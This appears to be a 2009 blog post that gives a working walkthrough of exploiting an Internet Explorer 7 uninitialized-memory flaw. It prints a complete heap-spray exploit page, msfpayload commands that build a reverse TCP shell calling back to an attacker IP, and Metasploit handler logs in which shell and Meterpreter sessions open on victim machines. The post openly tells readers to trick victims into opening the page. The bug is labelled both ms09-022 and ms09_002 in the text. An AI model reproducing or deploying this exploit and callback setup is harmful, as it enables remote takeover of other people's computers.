1 April 2009

. ms09-022 IE7 Memory Corruption

Ok folks, I assume all of you have heard about the Microsoft Internet Explorer Uninitialized Memory Remote Code Execution Vulnerability also known as ms09-022 which has been published on Feb 10 2009. This vulnerability allows remote attackers to execute arbitrary code on Windows systems that are running IE7, the range of the affected systems varies from WinXP SP2 up to Win2K8 (the Server Core installation option is not affected) releases.

As in many classic client-side attacks, end user's interaction is vital so to take control of his system and all our victim needs to do is visit the malicious page. The specific flaw exists in the handling of document objects. In particular, when an object is appended and deleted in a specific order, memory corruption occurs; successful exploitation leads to remote compromise of the affected system under the credentials of the currently logged in user.

Some of you may have already played with it extensively in your labs or in real environments as metasploit, Core Impact, Immunity CANVAS and other frameworks have included this exploit since the early days of its disclosure, however, some others may have difficulties with this one. Ok, enough with the theory, the guys from TippingPoint and the Zero Day Initiative who discovered the vulnerability did the hard work for us, and now have left us to experiment with our creativity. The exploit looks like the code below, the only thing you need to add is the payload in URL encoding scheme which easily can be generated using msfpayload from metasploit framework:

/msfpayload desired_payload LHOST=attacker_ip LPORT=attacker_listening_port J

example: ./msfpayload windows/shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 J

-------------code snip-------------
<html>
<script language="JavaScript">

var c=unescape("");//<-------Add your payload here

var array = new Array();
var ls = 0x100000-(c.length*2+0x01020);
var b = unescape("%u0C0C%u0C0C");

while(b.length<ls/2) { b+=b;}
var lh = b.substring(0,ls/2);
delete b;
for(i=0; i<0xC0; i++) {
array[i] = lh + c;
}
CollectGarbage();

var s1=unescape("%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA");
var a1 = new Array();
for(var x=0;x<1000;x++) a1.push(document.createElement("img"));

o1=document.createElement("tbody");
o1.click;
var o2 = o1.cloneNode();
o1.clearAttributes();
o1=null; CollectGarbage();
for(var x=0;x<a1.length;x++) a1[x].src=s1;
o2.click;

</script>
<script>window.setTimeout("ok();",800);</script>
</html>
-------------code snip-------------

Then save the page in html, prepare your netcat listener on port 4444 and trick your victim to open the html file. If you prefare, you can always use more advanced payloads such as meterpreter, in addition, if you target more than one users you should consider using the multi/handler module.

-------------example snip-------------
msf > use multi/handler
msf exploit(handler) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Command shell session 1 opened (192.168.1.100:4444 -> 192.168.1.133:1053)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\victim1\Desktop>ipconfig
Windows IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.1.133
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.1.1

C:\Documents and Settings\victim1\Desktop>
-------------example snip-------------

Or you can use msfconsole exclusively; note that we chose to use the meterpreter payload, just for change:

-------------example snip-------------
msf > use windows/browser/ms09_002_memory_corruption
msf exploit(ms09_002_memory_corruption) > set SRVHOST 192.168.1.100
SRVHOST => 192.168.1.100
msf exploit(ms09_002_memory_corruption) > set SRVPORT 8888
SRVPORT => 8888
msf exploit(ms09_002_memory_corruption) > set URIPATH ms09-22.html
URIPATH => test.html
msf exploit(ms09_002_memory_corruption) > set TARGET 0
TARGET => 0
msf exploit(ms09_002_memory_corruption) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms09_002_memory_corruption) > set LHOST 192.168.1.100
LHOST => 192.168.1.100
msf exploit(ms09_002_memory_corruption) > set LPORT 9898
LPORT => 9898
msf exploit(ms09_002_memory_corruption) > exploit
[*] Exploit running as background job.
msf exploit(ms09_002_memory_corruption) >
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Using URL: http://192.168.1.100:8888/ms09-22.html
[*] Server started.

//at this point the victim clicks on the URL: http://192.168.1.100:8888/ms09-22.html

msf exploit(ms09_002_memory_corruption) >
[*] Sending Internet Explorer 7 Uninitialized Memory Corruption Vulnerability to 192.168.1.105:1060...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.1.100:9898 -> 192.168.1.105:1061)

msf exploit(ms09_002_memory_corruption) > sessions -l

Active sessions
===============

Id Description Tunnel
-- ----------- ------
1 Meterpreter 192.168.1.100:9898 -> 192.168.1.105:1061

msf exploit(ms09_002_memory_corruption) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer: VICTIM-XPSP3
OS : Windows XP (Build 2600, Service Pack 3).
meterpreter >
-------------example snip-------------

0 comments: